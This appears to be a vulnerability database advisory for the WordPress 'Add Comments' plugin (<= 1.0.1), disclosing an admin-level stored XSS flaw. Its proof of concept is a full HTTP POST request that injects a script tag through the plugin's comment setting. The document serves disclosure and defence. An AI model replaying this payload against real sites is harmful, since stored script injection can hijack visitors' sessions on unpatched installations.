WordPress Plugin Vulnerabilities
Add Comments <= 1.0.1 - Admin+ Stored XSS
Description
The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).
Proof of Concept
POST /wp-admin/options-general.php?page=addComments HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://testing.local/wp-admin/options-general.php?page=addComments Content-Type: application/x-www-form-urlencoded Content-Length: 209 Origin: http://testing.local Connection: close Cookie: <snip> Upgrade-Insecure-Requests: 1 post_or_page=post&posts_list=1&pages_list=3&author_name=rss+feed+comments&author_email=fancybear0x%40gmail.com&author_url=&author_ip=127.0.0.1&comment=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&action=addcomments
Affects Plugins
No known fix - plugin closed
References
Classification
Miscellaneous
Original Researcher
roguethread
Submitter
roguethread
Verified
Yes
Timeline
Publicly Published
2022-11-10 (about 10 months ago)
Added
2022-11-10 (about 10 months ago)
Last Updated
2022-11-10 (about 10 months ago)